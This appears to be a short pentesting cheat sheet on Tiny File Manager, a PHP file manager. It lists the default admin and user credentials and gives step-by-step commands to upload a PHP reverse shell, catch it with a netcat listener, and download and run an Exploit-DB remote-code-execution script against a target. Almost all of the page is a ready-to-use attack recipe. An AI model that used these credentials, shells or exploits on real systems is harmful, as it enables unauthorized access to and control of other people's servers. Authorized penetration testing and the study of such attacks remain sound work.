Tiny File Manager Pentesting
Last modified: 2022-12-22
Tiny File Manager is a simple and small file manager with single php file.
Default Credentials
admin:admin@123
user:12345
Reverse Shell
If we can login and access the dashboard of the Tiny File Manager, upload the reverse shell script and get a shell.
First, download the reverse shell script.
wget https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php -O shell.php
Update values of “$ip” and “$port” in the above script to our local ip and port for listener which will start. Then upload the script to the arbitrary folder in the Tiny File Manager dashboard.
Now start netcat listener.
nc -lvnp 4444
Access the page with the uploaded script. e.g. "http://vulnerable.com/uploads/shell.php".
We should get a target shell.
Remote Code Execution (RCE) Version≤2.4.6
The payload can be downloaded from Exploit-DB
wget https://www.exploit-db.com/raw/50828 -O exploit.sh
dos2unix exploit.sh
chmod +x exploit.sh
./exploit.sh http://vulnerable.com/index.php admin "admin@123"
If you got the “jq not found” error, install it and run again.
sudo apt install jq